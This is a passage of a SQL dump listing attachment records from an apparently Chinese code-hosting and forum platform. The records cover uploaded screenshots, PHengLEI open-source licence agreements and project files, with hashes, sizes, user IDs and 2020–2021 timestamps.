11:19:02',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1252,219,'Issue','主体信息列表--白屏.PNG','8d36534b45d8662ca4eafa0625d0883b_1598340812367.PNG',27557,'image/png','8d36534b45d8662ca4eafa0625d0883b_1598340812367',1,46,'2020-08-25 07:33:32','','2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1253,NULL,NULL,'主体信息列表--白屏.PNG','8d36534b45d8662ca4eafa0625d0883b_1598341026775.PNG',27557,'image/png','8d36534b45d8662ca4eafa0625d0883b_1598341026775',1,1,'2020-08-25 07:37:06',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1254,NULL,NULL,'主体信息列表--白屏.PNG','8d36534b45d8662ca4eafa0625d0883b_1598341057069.PNG',27557,'image/png','8d36534b45d8662ca4eafa0625d0883b_1598341057069',6,1,'2020-08-25 07:37:37',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1255,NULL,NULL,'消息02.PNG','6af9b79120e8d561ffc9dd75082d5abb_1598341342515.PNG',110550,'image/png','6af9b79120e8d561ffc9dd75082d5abb_1598341342515',11,1,'2020-08-25 07:42:22',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1256,NULL,NULL,'点赞自己的帖子跳转01.PNG','c8f3788f2510d4ad572ce72eb0c68337_1598344168418.PNG',207678,'image/png','c8f3788f2510d4ad572ce72eb0c68337_1598344168418',13,1,'2020-08-25 08:29:28',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1257,NULL,NULL,'点赞自己的帖子跳转02.PNG','28def49b9484e8bd8a9edd7bdab2c20e_1598344183333.PNG',257438,'image/png','28def49b9484e8bd8a9edd7bdab2c20e_1598344183333',13,1,'2020-08-25 08:29:43',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1258,NULL,NULL,'image.png','28c5a25899befb5be45a7f0ed3a357ca_1598347384080.png',173445,'image/png','28c5a25899befb5be45a7f0ed3a357ca_1598347384080',7,1,'2020-08-25 09:23:04',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1259,19,'Notice','GCC2020参赛指南-第1组-任务挑战组-V3.3.pdf','200826140317_e498716253cfd80a255410072bd558cf.pdf',1472840,'','d46436058e7f96062efdef7b19843801',2,111,'2020-08-26 14:03:17',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1260,NULL,NULL,'论坛--后台--回复查看01.PNG','348bea035c146658b2f6c814819f6b78_1598424675892.PNG',86221,'image/png','348bea035c146658b2f6c814819f6b78_1598424675892',6,1,'2020-08-26 06:51:15',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1261,NULL,NULL,'论坛--后台--回复查看02.PNG','f03ea5ad0699d86b80e61adc80d9ae41_1598424693378.PNG',143212,'image/png','f03ea5ad0699d86b80e61adc80d9ae41_1598424693378',5,1,'2020-08-26 06:51:33',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1262,NULL,NULL,'开源项目--代码库02.PNG','00d33d423816f3de8a5595a5167f5cc5_1598430520106.PNG',101096,'image/png','00d33d423816f3de8a5595a5167f5cc5_1598430520106',1,1,'2020-08-26 08:28:40',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1263,NULL,NULL,'开源项目--代码库03.PNG','a3550236ff4fe54ae088ad07f3151feb_1598430563949.PNG',114095,'image/png','a3550236ff4fe54ae088ad07f3151feb_1598430563949',1,1,'2020-08-26 08:29:23',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1264,NULL,NULL,'开源项目--代码库04.PNG','827642b8c2b98a12b95d7d54d9e48c53_1598430859610.PNG',115604,'image/png','827642b8c2b98a12b95d7d54d9e48c53_1598430859610',1,1,'2020-08-26 08:34:19',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1265,NULL,NULL,'开源项目--代码库01.PNG','15877dc81dd2cef0d741261c1b1fb3ea_1598431309931.PNG',181862,'image/png','15877dc81dd2cef0d741261c1b1fb3ea_1598431309931',1,1,'2020-08-26 08:41:49',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1266,NULL,NULL,'开源项目--代码库02.PNG','00d33d423816f3de8a5595a5167f5cc5_1598431327233.PNG',101096,'image/png','00d33d423816f3de8a5595a5167f5cc5_1598431327233',15,1,'2020-08-26 08:42:07',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1267,NULL,NULL,'开源项目--代码库03.PNG','a3550236ff4fe54ae088ad07f3151feb_1598431421244.PNG',114095,'image/png','a3550236ff4fe54ae088ad07f3151feb_1598431421244',15,1,'2020-08-26 08:43:41',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1268,NULL,NULL,'开源项目--代码库04.PNG','827642b8c2b98a12b95d7d54d9e48c53_1598431480893.PNG',115604,'image/png','827642b8c2b98a12b95d7d54d9e48c53_1598431480893',15,1,'2020-08-26 08:44:40',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1269,NULL,NULL,'开源项目--代码库05.PNG','4acb26f5ceec9903adc7a2b0cf5777fd_1598431574770.PNG',75836,'image/png','4acb26f5ceec9903adc7a2b0cf5777fd_1598431574770',15,1,'2020-08-26 08:46:14',NULL,'2020/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(1270,NULL,NULL,'kulou.ong.jpeg','afe1842794b04bf4583dee770ce313ec_1599467663067.jpeg',11762,'image/jpeg','afe1842794b04bf4583dee770ce313ec_1599467663067',1,48,'2020-09-07 08:34:23',NULL,'2020/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(1272,NULL,NULL,'开源项目——新建文件 (1).PNG','200910142138_085016efdcdd08a909fb75872adfdcba.PNG',33031,'','786ea6b1f3a018d96081e01f6385905a',1,1,'2020-09-10 14:21:38',NULL,'2020/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(1273,32,'Notice','507615.png','200917111642_507615.png',85622,'','dff2a85545075de1c30fb60bbe675502',2,111,'2020-09-17 11:16:42',NULL,'2020/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(1276,NULL,NULL,'百度.png','200918154440_471d6ceb9f3691513d7b5ce2545e1818.png',9370,'','24a5b9508a23a2792979bccdaedf94a0',1,111,'2020-09-18 15:44:40',NULL,'2020/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(1280,NULL,NULL,'unnamed.jpg','201013172842_unnamed.jpg',35836,'','28417b69d1bb1ad897f2e76de8586655',1,1,'2020-10-13 17:28:42',NULL,'2020/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(1281,168,'Paper','购物网站.vsdx','201015102635_3f36500741098f33e51e9c952bc96761.vsdx',37452,'','3742c4aa6cf80117a38bbed1c35be71e',0,46,'2020-10-15 10:26:35',NULL,'2020/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(1282,169,'Paper','专家评审系统方案.txt','201015103234_7eea0398d3e1bcc7c801361058fb9f6a.txt',6,'','7e4fcd4a0fbe5694e17b818de2c76869',0,66,'2020-10-15 10:32:34',NULL,'2020/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(1283,170,'Paper','基于Java的在线户籍申报系统.txt','201015104202_5286584969c0285e15c3acc665a0764f.txt',289,'','63c4a03450dedc382aae194044049d30',0,63,'2020-10-15 10:42:02',NULL,'2020/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(1284,171,'Paper','2.png','201015110016_2.png',30846,'','d9a41335fda178c80a78f9165561dda0',0,46,'2020-10-15 11:00:16',NULL,'2020/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(1285,172,'Paper','rapidminer_frame_icon_64.png','201015110352_rapidminer_frame_icon_64.png',4083,'','d71bd07634c9cd880d74623b735b7b72',0,63,'2020-10-15 11:03:52',NULL,'2020/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(1286,116,'Task','文本挖掘主要过程.png','201015172159_4f2158552925aa24e75ee01b5d38c828.png',87529,'','1e0aac81da5271894d674ef1e93ec2a3',2,46,'2020-10-15 17:21:59',NULL,'2020/10',2,1,NULL,NULL,1,NULL,0,1602754090,NULL),(1287,117,'Task','文本挖掘主要过程.png','201016080724_4f2158552925aa24e75ee01b5d38c828.png',87529,'','1e0aac81da5271894d674ef1e93ec2a3',2,46,'2020-10-16 08:07:24',NULL,'2020/10',2,1,NULL,NULL,1,NULL,0,1602806868,NULL),(1288,115,'Task','HELP.md','201016082424_HELP.md',915,'','1da938aa807ede723d9af30a51446647',0,49,'2020-10-16 08:24:24',NULL,'2020/10',2,1,NULL,NULL,1,NULL,0,1602807888,NULL),(1289,149,'Review','HELP.md','201016082945_HELP.md',915,'','1da938aa807ede723d9af30a51446647',0,49,'2020-10-16 08:29:45',NULL,'2020/10',3,1,NULL,NULL,1,NULL,0,0,NULL),(1290,150,'Review','readme.txt','201016083237_readme.txt',0,'','d41d8cd98f00b204e9800998ecf8427e',0,49,'2020-10-16 08:32:37',NULL,'2020/10',4,1,NULL,NULL,1,NULL,0,0,NULL),(1291,118,'Task','pom.xml','201016084731_pom.xml',1794,'','0e916009fb91516c34b8b20696bbab78',0,49,'2020-10-16 08:47:31',NULL,'2020/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(1292,118,'Task','文本挖掘主要过程.png','201016085442_4f2158552925aa24e75ee01b5d38c828.png',87529,'','1e0aac81da5271894d674ef1e93ec2a3',2,46,'2020-10-16 08:54:42',NULL,'2020/10',2,1,NULL,NULL,1,NULL,0,1602809793,NULL),(1293,152,'Review','pom.xml','201016090035_pom.xml',1794,'','0e916009fb91516c34b8b20696bbab78',0,49,'2020-10-16 09:00:35',NULL,'2020/10',3,1,NULL,NULL,1,NULL,0,0,NULL),(1294,153,'Review','.gitignore','201016090324_.gitignore',395,'','127a1b8a6ebe8766c3a7fffba37385c6',0,49,'2020-10-16 09:03:24',NULL,'2020/10',4,1,NULL,NULL,1,NULL,0,0,NULL),(1295,178,'Paper','“车辆运动状态信息评级”实例编写与对比.pdf','201016123305_b8d1c1adff8c46453ee14964f690a4a4.pdf',843019,'','10ee6ace26ae587d86facee2b002dc4f',0,66,'2020-10-16 12:33:05',NULL,'2020/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(1296,119,'Task','jb51.net.txt','201016145950_jb51.net.txt',4848,'','1a84430e677616c4c4af9d8c52a70e8a',0,46,'2020-10-16 14:59:50',NULL,'2020/10',2,1,NULL,NULL,1,NULL,0,1602831615,NULL),(1297,NULL,NULL,'fork速度慢.PNG','8f515cc8920069968f354e88743e152d_1603354501603.PNG',149293,'image/png','8f515cc8920069968f354e88743e152d_1603354501603',1,1,'2020-10-22 08:15:01',NULL,'2020/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(1298,116,'Task','消息02.PNG','201022162123_5d3f640cb07922b19fe24a18450c3f68.PNG',110550,'','6af9b79120e8d561ffc9dd75082d5abb',0,46,'2020-10-22 16:21:23',NULL,'2020/10',3,1,NULL,NULL,1,NULL,0,0,NULL),(1303,28,'Competition','aea64679e5c69db16f84ad469bdf52a9.jpg','201109085813_aea64679e5c69db16f84ad469bdf52a9.jpg',1287304,'','a0e5a24fc21908c3b1f18d155b3542d8',4,46,'2020-11-09 08:58:13',NULL,'2020/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(1307,NULL,NULL,'timg.jpeg','ef9c384c0f6b9ceb09b7eb3ffb3409f4_1609229054796.jpeg',8028,'image/jpeg','ef9c384c0f6b9ceb09b7eb3ffb3409f4_1609229054796',0,132,'2020-12-29 08:04:14',NULL,'2020/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(1308,NULL,NULL,'72eb96cb8ed6130f10f4153316ad48c6.jpg','6094fad7101d87ad6479552f94ef58d6_1609230700501.jpg',240852,'image/jpeg','6094fad7101d87ad6479552f94ef58d6_1609230700501',0,133,'2020-12-29 08:31:40',NULL,'2020/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(1319,NULL,NULL,'PHengLEI软件开源协议.pdf','a240cab93d87af28bad9198f57f84798_1609388104789.pdf',52123,'application/pdf','a240cab93d87af28bad9198f57f84798_1609388104789',0,66,'2020-12-31 04:15:04',NULL,'2020/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(1329,NULL,NULL,'编组 12.png','085a1855d7161a40833d198af7304b35_1609398836591.png',7926,'image/png','085a1855d7161a40833d198af7304b35_1609398836591',0,133,'2020-12-31 07:13:56',NULL,'2020/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(1334,48,'ApplySignature','插图.png','e6031feb1b8285a31c950606049a541d_1609745586158.png',93691,'image/png','e6031feb1b8285a31c950606049a541d_1609745586158',3,133,'2021-01-04 07:33:06',NULL,'2021/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(1335,46,'ApplySignature','timg.jpeg','ef9c384c0f6b9ceb09b7eb3ffb3409f4_1609748432401.jpeg',8028,'image/jpeg','ef9c384c0f6b9ceb09b7eb3ffb3409f4_1609748432401',2,128,'2021-01-04 08:20:32',NULL,'2021/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(1345,55,'ApplySignature','S1ZyJZ9mDUOxhJ7bRyziUw==_Legion.db','f6fc1c6a88fc709a39875d7f1efe85ac_1609837452765.db',41548,'application/octet-stream','f6fc1c6a88fc709a39875d7f1efe85ac_1609837452765',0,1,'2021-01-05 09:04:12',NULL,'2021/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(1351,38,'ForumSection','logo.png','210106164130_logo.png',15350,'','a43f28ace8e3517155773da7e2f1b724',172,1,'2021-01-06 16:41:30',NULL,'2021/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(1352,61,'ApplySignature','PHengLEI软件开源协议.docx','92958a5ec57e4f2c6fffb470d9c993e8_1609983866256.docx',20348,'application/vnd.openxmlformats-officedocument.wordprocessingml.document','92958a5ec57e4f2c6fffb470d9c993e8_1609983866256',0,46,'2021-01-07 01:44:26',NULL,'2021/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(1353,NULL,NULL,'662b09b688de175bda67199e96811863','210108151648_662b09b688de175bda67199e96811863',37157,'image/png','8c587a1aaf48a9fc6481d193bb1ae94d',0,50,'2021-01-08 15:16:48',NULL,'2021/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(1354,NULL,NULL,'92de6aace269ea5bc1fd6a5bb6c893ae','',0,'','',0,50,'2021-01-08 15:18:31',NULL,NULL,1,1,NULL,NULL,1,NULL,0,0,NULL),(1362,69,'ApplySignature','71_1_14.zip','595367de09839c7e56bf970bd857349b_1611023384502.zip',63590,'application/x-zip-compressed','595367de09839c7e56bf970bd857349b_1611023384502',0,1,'2021-01-19 02:29:44',NULL,'2021/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(1363,NULL,NULL,'aaea8a82e1e0d3e40e47ab2fac4974f4','',0,'','',0,50,'2021-01-22 10:49:25',NULL,NULL,1,1,NULL,NULL,1,NULL,0,0,NULL),(1364,NULL,NULL,'b961b3207aa36f9c7773d236298e4189','',0,'','',0,50,'2021-01-22 10:50:49',NULL,NULL,1,1,NULL,NULL,1,NULL,0,0,NULL),(1365,252,'Issue','# Git 大全 .md','9245027b735e10cf774d8d5c73d01611_1611553090742.md',11096,'text/markdown','9245027b735e10cf774d8d5c73d01611_1611553090742',1,155,'2021-01-25 05:38:10','','2021/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(1366,70,'ApplySignature','# Git 大全 .md','9245027b735e10cf774d8d5c73d01611_1611557879683.md',11096,'text/markdown','9245027b735e10cf774d8d5c73d01611_1611557879683',0,155,'2021-01-25 06:57:59',NULL,'2021/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(1367,NULL,NULL,'PHengLEI软件开源协议.docx','e2e9b7715c986b38596a95391d511396_1611626367182.docx',22042,'application/vnd.openxmlformats-officedocument.wordprocessingml.document','e2e9b7715c986b38596a95391d511396_1611626367182',0,122,'2021-01-26 01:59:27',NULL,'2021/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(1368,71,'ApplySignature','风雷板块说明.txt','94e2c62a6e326e9f381ac85e8410ea9c_1611708383092.txt',727,'text/plain','94e2c62a6e326e9f381ac85e8410ea9c_1611708383092',0,1,'2021-01-27 00:46:23',NULL,'2021/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(1369,72,'ApplySignature','71_1_14.zip','595367de09839c7e56bf970bd857349b_1611709338695.zip',63590,'application/x-zip-compressed','595367de09839c7e56bf970bd857349b_1611709338695',0,49,'2021-01-27 01:02:18',NULL,'2021/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(1370,73,'ApplySignature','111.JPG','2eaf4b9bd4a0ca7cc0bc878295a2d12f_1611711353789.JPG',365250,'image/jpeg','2eaf4b9bd4a0ca7cc0bc878295a2d12f_1611711353789',0,73,'2021-01-27 01:35:53',NULL,'2021/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(1371,NULL,NULL,'流程.txt','42cb9873547736f9a0ed2454f4cb4c2a_1611814765177.txt',3046,'text/plain','42cb9873547736f9a0ed2454f4cb4c2a_1611814765177',0,48,'2021-01-28 06:19:25',NULL,'2021/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(1372,360,'License','PHengLEI软件开源协议.docx','9dec297e83518dc70cbe1a554c9ce1d9_1611816207262.docx',21957,'application/vnd.openxmlformats-officedocument.wordprocessingml.document','9dec297e83518dc70cbe1a554c9ce1d9_1611816207262',0,128,'2021-01-28 06:43:27',NULL,'2021/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(1373,74,'ApplySignature','PHengLEI软件开源协议.pdf','a240cab93d87af28bad9198f57f84798_1611817787914.pdf',52123,'application/pdf','a240cab93d87af28bad9198f57f84798_1611817787914',5,46,'2021-01-28 07:09:47',NULL,'2021/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(1374,257,'Issue','流程.txt','42cb9873547736f9a0ed2454f4cb4c2a_1611818790360.txt',3046,'text/plain','42cb9873547736f9a0ed2454f4cb4c2a_1611818790360',1,48,'2021-01-28 07:26:30','','2021/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(1375,75,'ApplySignature','PHengLEI软件开源协议.docx','3c0ef7ff2e6c4ecd987de3cdd00b1653_1611821098772.docx',19049,'application/vnd.openxmlformats-officedocument.wordprocessingml.document','3c0ef7ff2e6c4ecd987de3cdd00b1653_1611821098772',2,157,'2021-01-28 08:04:58',NULL,'2021/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(1376,76,'ApplySignature','PHengLEIè½¯ä»¶å¼æºåè®®.docx','905102f8af86ec1e2e03beaf4fe67424_1611821369833.docx',19654,'application/vnd.openxmlformats-officedocument.wordprocessingml.document','905102f8af86ec1e2e03beaf4fe67424_1611821369833',1,158,'2021-01-28 08:09:29',NULL,'2021/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(1377,77,'ApplySignature','PHengLEI软件开源协议.docx','1ac73d8496a8edbac05c9b8aa1e0ff37_1611821879193.docx',18999,'application/vnd.openxmlformats-officedocument.wordprocessingml.document','1ac73d8496a8edbac05c9b8aa1e0ff37_1611821879193',1,137,'2021-01-28 08:17:59',NULL,'2021/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(1378,78,'ApplySignature','PHengLEI软件开源协议.docx','3c0ef7ff2e6c4ecd987de3cdd00b1653_1611829756511.docx',19049,'application/vnd.openxmlformats-officedocument.wordprocessingml.document','3c0ef7ff2e6c4ecd987de3cdd00b1653_1611829756511',1,159,'2021-01-28 10:29:16',NULL,'2021/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(1379,79,'ApplySignature','PHengLEI软件开源协议.docx','9dec297e83518dc70cbe1a554c9ce1d9_1611843056678.docx',21957,'application/vnd.openxmlformats-officedocument.wordprocessingml.document','9dec297e83518dc70cbe1a554c9ce1d9_1611843056678',2,152,'2021-01-28 14:10:56',NULL,'2021/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(1380,80,'ApplySignature','PHengLEI软件开源协议-孟丽媛.docx','ac2fd902ea6a4ae5e9dc01e78d1a371b_1611847636840.docx',20086,'application/vnd.openxmlformats-officedocument.wordprocessingml.document','ac2fd902ea6a4ae5e9dc01e78d1a371b_1611847636840',1,160,'2021-01-28 15:27:16',NULL,'2021/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(1381,81,'ApplySignature','PHengLEI软件开源协议-孟丽媛.docx','ac2fd902ea6a4ae5e9dc01e78d1a371b_1611847979792.docx',20086,'application/vnd.openxmlformats-officedocument.wordprocessingml.document','ac2fd902ea6a4ae5e9dc01e78d1a371b_1611847979792',1,160,'2021-01-28 15:32:59',NULL,'2021/01',1,1,NULL,NULL,1,NULL,0,0,NULL),(1383,NULL,NULL,'打开文档.PNG','19f8537314416dd626753aff57fbe522_1613612748253.PNG',64350,'image/png','19f8537314416dd626753aff57fbe522_1613612748253',7,46,'2021-02-18 01:45:48',NULL,'2021/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1384,82,'ApplySignature','PHengLEI软件开源协议.docx','2aa3af59a02cdb7e1d798fcdd0952c97_1613784480350.docx',42713,'application/vnd.openxmlformats-officedocument.wordprocessingml.document','2aa3af59a02cdb7e1d798fcdd0952c97_1613784480350',1,162,'2021-02-20 01:28:00',NULL,'2021/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1386,83,'ApplySignature','风雷.pdf','1d05df73f21ed519bb90f3ea862a1c98_1613785399265.pdf',101011,'application/pdf','1d05df73f21ed519bb90f3ea862a1c98_1613785399265',1,164,'2021-02-20 01:43:19',NULL,'2021/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1387,NULL,NULL,'IMG_20210218_182525.jpg','e7d37d80f4b9f63d2c4e7c60166b6d5e_1613786323343.jpg',2611810,'image/jpeg','e7d37d80f4b9f63d2c4e7c60166b6d5e_1613786323343',0,167,'2021-02-20 01:58:43',NULL,'2021/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1388,84,'ApplySignature','IMG_20210218_182533.jpg','a773abd315ef521ebeb747f824e497b3_1613786329558.jpg',2116340,'image/jpeg','a773abd315ef521ebeb747f824e497b3_1613786329558',1,167,'2021-02-20 01:58:49',NULL,'2021/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1389,85,'ApplySignature','PHengLEI软件开源协议-江苏大学 朱跃进.pdf','d7d59bb5d4c5761b1c7590b4386a5652_1613789396582.pdf',235522,'application/pdf','d7d59bb5d4c5761b1c7590b4386a5652_1613789396582',1,171,'2021-02-20 02:49:56',NULL,'2021/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1390,86,'ApplySignature','PHengLEI软件开源协议.docx','9dec297e83518dc70cbe1a554c9ce1d9_1613796274520.docx',21957,'application/vnd.openxmlformats-officedocument.wordprocessingml.document','9dec297e83518dc70cbe1a554c9ce1d9_1613796274520',0,155,'2021-02-20 04:44:34',NULL,'2021/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1391,87,'ApplySignature','0205_1.jpg','1701153b1382ce9cdce5cf4cdbdf1685_1613958275162.jpg',1868894,'image/jpeg','1701153b1382ce9cdce5cf4cdbdf1685_1613958275162',0,174,'2021-02-22 01:44:35',NULL,'2021/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1392,2,'ProjectDetail','7.png','8579b6e3ff5290794531900035387139_1613982759950.png',241614,'image/png','8579b6e3ff5290794531900035387139_1613982759950',1,49,'2021-02-22 08:32:39','','2021/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1393,NULL,NULL,'0205_1.jpg','1701153b1382ce9cdce5cf4cdbdf1685_1614044902125.jpg',1868894,'image/jpeg','1701153b1382ce9cdce5cf4cdbdf1685_1614044902125',0,174,'2021-02-23 01:48:22',NULL,'2021/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1394,180,'Paper','5.关注提醒.jpg','210223144525_6d42f0cced788ec1f1ebdd9483f6e54f.jpg',118239,'','3c0c7da29c819a24fb51aecba7a45485',1,73,'2021-02-23 14:45:25',NULL,'2021/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1395,121,'Task','71_1_14.zip','210223163410_71_1_14.zip',63590,'','595367de09839c7e56bf970bd857349b',0,1,'2021-02-23 16:34:10',NULL,'2021/02',2,1,NULL,NULL,1,NULL,0,1614069276,NULL),(1396,122,'Task','7.png','210223165314_7.png',241614,'','8579b6e3ff5290794531900035387139',1,49,'2021-02-23 16:53:14',NULL,'2021/02',2,1,NULL,NULL,1,NULL,0,1614070426,NULL),(1397,NULL,NULL,'0205_1.jpg','1701153b1382ce9cdce5cf4cdbdf1685_1614132578066.jpg',1868894,'image/jpeg','1701153b1382ce9cdce5cf4cdbdf1685_1614132578066',0,174,'2021-02-24 02:09:38',NULL,'2021/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1398,88,'ApplySignature','风雷开源协议签署页.PNG','2308a3af08f6918f6d868442fa7ad355_1614214069561.PNG',285503,'image/png','2308a3af08f6918f6d868442fa7ad355_1614214069561',1,181,'2021-02-25 00:47:49',NULL,'2021/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1399,89,'ApplySignature','图.png','f5fbb40a99bf8d1ad62f1122188f8f9a_1614215270787.png',538930,'image/png','f5fbb40a99bf8d1ad62f1122188f8f9a_1614215270787',0,182,'2021-02-25 01:07:50',NULL,'2021/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1400,90,'ApplySignature','ceshi.jpg','f317e3fe638cdf19acad8d42166ca011_1614234551083.jpg',17668,'image/jpeg','f317e3fe638cdf19acad8d42166ca011_1614234551083',1,128,'2021-02-25 06:29:11',NULL,'2021/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1401,91,'ApplySignature','ceshi.jpg','f317e3fe638cdf19acad8d42166ca011_1614243419064.jpg',17668,'image/jpeg','f317e3fe638cdf19acad8d42166ca011_1614243419064',0,128,'2021-02-25 08:56:59',NULL,'2021/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1402,92,'ApplySignature','申请表.pdf','e8b509bf7d78c82f8050fced3b00bb19_1614259412868.pdf',384092,'application/pdf','e8b509bf7d78c82f8050fced3b00bb19_1614259412868',1,179,'2021-02-25 13:23:32',NULL,'2021/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1403,93,'ApplySignature','风雷开源协议签署页.PNG','2308a3af08f6918f6d868442fa7ad355_1614306426123.PNG',285503,'image/png','2308a3af08f6918f6d868442fa7ad355_1614306426123',0,184,'2021-02-26 02:27:06',NULL,'2021/02',1,1,NULL,NULL,1,NULL,0,0,NULL),(1404,NULL,NULL,'图片.png','ad4e3395cfb56d9a57bd89c842503b1d_1614587100650.png',61208,'image/png','ad4e3395cfb56d9a57bd89c842503b1d_1614587100650',10,73,'2021-03-01 08:25:00',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1405,94,'ApplySignature','PHengLEI软件开源协议.docx','b8b08b9e452eb68951f6e75a1fd3035f_1614597217068.docx',20227,'application/vnd.openxmlformats-officedocument.wordprocessingml.document','b8b08b9e452eb68951f6e75a1fd3035f_1614597217068',0,186,'2021-03-01 11:13:37',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1406,NULL,NULL,'图片.png','025ae0e2937e18824f6589bf6429acb2_1614668397433.png',54747,'image/png','025ae0e2937e18824f6589bf6429acb2_1614668397433',18,46,'2021-03-02 06:59:57',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1407,NULL,NULL,'图片.png','3571433654e06e1e26db780a8a43e79e_1614668423358.png',64649,'image/png','3571433654e06e1e26db780a8a43e79e_1614668423358',18,46,'2021-03-02 07:00:23',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1408,NULL,NULL,'项目筛选数量对不上.PNG','3694308cc2fc9ff8d341f0371253fd4f_1614668681283.PNG',108345,'image/png','3694308cc2fc9ff8d341f0371253fd4f_1614668681283',14,46,'2021-03-02 07:04:41',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1409,NULL,NULL,'image.png','dbf687b3c5d290784e19b1c5a8d77d23_1614678047420.png',177801,'image/png','dbf687b3c5d290784e19b1c5a8d77d23_1614678047420',10,128,'2021-03-02 09:40:47',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1410,NULL,NULL,'image.png','dbf687b3c5d290784e19b1c5a8d77d23_1614678048409.png',177801,'image/png','dbf687b3c5d290784e19b1c5a8d77d23_1614678048409',1,128,'2021-03-02 09:40:48',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1411,NULL,NULL,'image.png','dbf687b3c5d290784e19b1c5a8d77d23_1614678048676.png',177801,'image/png','dbf687b3c5d290784e19b1c5a8d77d23_1614678048676',1,128,'2021-03-02 09:40:48',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1412,NULL,NULL,'image.png','dbf687b3c5d290784e19b1c5a8d77d23_1614678048940.png',177801,'image/png','dbf687b3c5d290784e19b1c5a8d77d23_1614678048940',1,128,'2021-03-02 09:40:48',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1413,NULL,NULL,'image.png','dbf687b3c5d290784e19b1c5a8d77d23_1614678049034.png',177801,'image/png','dbf687b3c5d290784e19b1c5a8d77d23_1614678049034',1,128,'2021-03-02 09:40:49',NULL,'2021/03',1,1,NULL,NULL,1,NULL,0,0,NULL),(1414,NULL,NULL,'image.png','2716c760934380da10dae2b036836587_1614678112239.png',104224,'image/png','2716c760934380da10dae2b036836587_1614678112239',12,128,'2021-03-02 